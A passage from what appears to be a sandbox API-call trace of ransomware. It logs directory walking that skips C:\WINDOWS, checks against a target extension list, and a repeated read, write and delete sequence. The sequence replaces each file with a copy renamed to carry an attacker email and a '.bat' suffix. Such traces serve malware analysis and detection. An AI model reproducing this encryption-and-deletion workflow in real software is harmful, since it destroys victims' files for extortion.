[0070.171] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0070.171] lstrlenW (lpString=".bz2") returned 4 [0070.172] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0070.172] lstrlenW (lpString=".7z") returned 3 [0070.172] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0070.172] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0070.172] lstrlenW (lpString=".dbf") returned 4 [0070.172] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0070.172] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0070.172] lstrlenW (lpString=".1cd") returned 4 [0070.172] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0070.172] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0070.172] lstrlenW (lpString=".jpg") returned 4 [0070.172] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0070.172] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0070.172] lstrlenW (lpString="api-ms-win-core-file-l1-2-0.dll") returned 31 [0070.172] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0070.172] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=18624) returned 1 [0070.172] CloseHandle (hObject=0x354) returned 1 [0070.172] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll")) returned 0x20 [0070.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0070.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0070.173] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.173] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0070.174] GetLastError () returned 0x0 [0070.174] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x48c0, lpOverlapped=0x0) returned 1 [0070.175] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x48d0, lpOverlapped=0x0) returned 1 [0070.176] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.176] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x112, lpOverlapped=0x0) returned 1 [0070.176] SetEndOfFile (hFile=0x32c) returned 1 [0070.176] CloseHandle (hObject=0x32c) returned 1 [0070.176] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.176] SetEndOfFile (hFile=0x354) returned 1 [0070.177] CloseHandle (hObject=0x354) returned 1 [0070.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0070.177] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll")) returned 1 [0070.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0070.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0070.178] lstrlenW (lpString=".doc") returned 4 [0070.178] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0070.178] lstrlenW (lpString=".docx") returned 5 [0070.178] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0070.178] lstrlenW (lpString=".pdf") returned 4 [0070.178] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0070.178] lstrlenW (lpString=".xls") returned 4 [0070.178] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0070.178] lstrlenW (lpString=".xlsx") returned 5 [0070.178] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0070.178] lstrlenW (lpString=".ppt") returned 4 [0070.178] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0070.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0070.178] lstrlenW (lpString=".zip") returned 4 [0070.178] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0070.178] lstrlenW (lpString=".rar") returned 4 [0070.178] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0070.178] lstrlenW (lpString=".bz2") returned 4 [0070.178] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0070.178] lstrlenW (lpString=".7z") returned 3 [0070.178] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0070.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0070.178] lstrlenW (lpString=".dbf") returned 4 [0070.178] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0070.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0070.178] lstrlenW (lpString=".1cd") returned 4 [0070.179] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0070.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0070.179] lstrlenW (lpString=".jpg") returned 4 [0070.179] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0070.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0070.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0070.179] lstrlenW (lpString=".doc") returned 4 [0070.179] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0070.179] lstrlenW (lpString=".docx") returned 5 [0070.179] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0070.179] lstrlenW (lpString=".pdf") returned 4 [0070.179] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0070.179] lstrlenW (lpString=".xls") returned 4 [0070.179] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0070.179] lstrlenW (lpString=".xlsx") returned 5 [0070.179] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0070.179] lstrlenW (lpString=".ppt") returned 4 [0070.179] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0070.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0070.179] lstrlenW (lpString=".zip") returned 4 [0070.179] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0070.179] lstrlenW (lpString=".rar") returned 4 [0070.179] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0070.179] lstrlenW (lpString=".bz2") returned 4 [0070.179] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0070.179] lstrlenW (lpString=".7z") returned 3 [0070.179] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0070.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0070.179] lstrlenW (lpString=".dbf") returned 4 [0070.179] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0070.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0070.180] lstrlenW (lpString=".1cd") returned 4 [0070.180] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0070.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0070.180] lstrlenW (lpString=".jpg") returned 4 [0070.180] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0070.180] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0070.180] lstrlenW (lpString="api-ms-win-core-file-l2-1-0.dll") returned 31 [0070.180] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0070.190] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=18624) returned 1 [0070.190] CloseHandle (hObject=0x354) returned 1 [0070.190] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll")) returned 0x20 [0070.190] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0070.190] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0070.190] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.190] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.190] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0070.190] GetLastError () returned 0x0 [0070.191] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x48c0, lpOverlapped=0x0) returned 1 [0070.199] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x48d0, lpOverlapped=0x0) returned 1 [0070.200] ReadFile (in: hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.200] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x112, lpOverlapped=0x0) returned 1 [0070.200] SetEndOfFile (hFile=0x32c) returned 1 [0070.200] CloseHandle (hObject=0x32c) returned 1 [0070.200] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.200] SetEndOfFile (hFile=0x354) returned 1 [0071.588] CloseHandle (hObject=0x354) returned 1 [0071.671] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0071.671] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll")) returned 1 [0071.897] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0071.897] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0071.897] lstrlenW (lpString=".doc") returned 4 [0071.897] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.897] lstrlenW (lpString=".docx") returned 5 [0071.897] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.897] lstrlenW (lpString=".pdf") returned 4 [0071.897] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.897] lstrlenW (lpString=".xls") returned 4 [0071.897] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.897] lstrlenW (lpString=".xlsx") returned 5 [0071.897] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.897] lstrlenW (lpString=".ppt") returned 4 [0071.897] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0071.898] lstrlenW (lpString=".zip") returned 4 [0071.898] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.898] lstrlenW (lpString=".rar") returned 4 [0071.898] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.898] lstrlenW (lpString=".bz2") returned 4 [0071.898] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.898] lstrlenW (lpString=".7z") returned 3 [0071.898] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0071.898] lstrlenW (lpString=".dbf") returned 4 [0071.898] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0071.898] lstrlenW (lpString=".1cd") returned 4 [0071.898] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0071.898] lstrlenW (lpString=".jpg") returned 4 [0071.898] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0071.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0071.898] lstrlenW (lpString=".doc") returned 4 [0071.898] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0071.898] lstrlenW (lpString=".docx") returned 5 [0071.898] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0071.898] lstrlenW (lpString=".pdf") returned 4 [0071.898] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0071.898] lstrlenW (lpString=".xls") returned 4 [0071.898] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0071.898] lstrlenW (lpString=".xlsx") returned 5 [0071.898] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0071.898] lstrlenW (lpString=".ppt") returned 4 [0071.898] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0071.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0071.898] lstrlenW (lpString=".zip") returned 4 [0071.898] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0071.898] lstrlenW (lpString=".rar") returned 4 [0071.898] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0071.899] lstrlenW (lpString=".bz2") returned 4 [0071.899] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0071.899] lstrlenW (lpString=".7z") returned 3 [0071.899] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0071.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0071.899] lstrlenW (lpString=".dbf") returned 4 [0071.899] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0071.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0071.899] lstrlenW (lpString=".1cd") returned 4 [0071.899] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0071.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0071.899] lstrlenW (lpString=".jpg") returned 4 [0071.899] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0071.899] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0071.899] lstrlenW (lpString="api-ms-win-crt-filesystem-l1-1-0.dll") returned 36 [0071.899] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0071.899] GetFileSizeEx (in: hFile=0x36c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=20672) returned 1 [0071.899] CloseHandle (hObject=0x36c) returned 1 [0071.899] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll")) returned 0x20 [0071.900] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0071.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0071.900] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.900] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0071.900] GetLastError () returned 0x0 [0071.900] ReadFile (in: hFile=0x36c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x50c0, lpOverlapped=0x0) returned 1 [0072.274] WriteFile (hFile=0x354, lpBuffer=0x4026020, nNumberOfBytesToWrite=0x50d0, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0) Thread: id = 18 os_tid = 0xd9c [0045.447] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3c90e38 [0045.447] lstrlenW (lpString="C:") returned 2 [0045.447] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x348fcf8 | out: lpFindFileData=0x348fcf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x5e9398 [0045.458] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0045.458] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent") returned 1 [0045.458] lstrlenW (lpString="$GetCurrent") returned 11 [0045.458] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$GetCurrent") returned 1 [0045.458] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.459] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0045.459] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x4260548 [0045.462] FindNextFileW (in: hFindFile=0x4260548, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0045.462] FindNextFileW (in: hFindFile=0x4260548, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Logs", cAlternateFileName="")) returned 1 [0045.462] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0045.462] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent\\Logs") returned 1 [0045.462] lstrlenW (lpString="Logs") returned 4 [0045.462] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Logs") returned -1 [0045.462] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4261060 [0045.463] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0045.463] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260288 [0045.554] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.554] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, 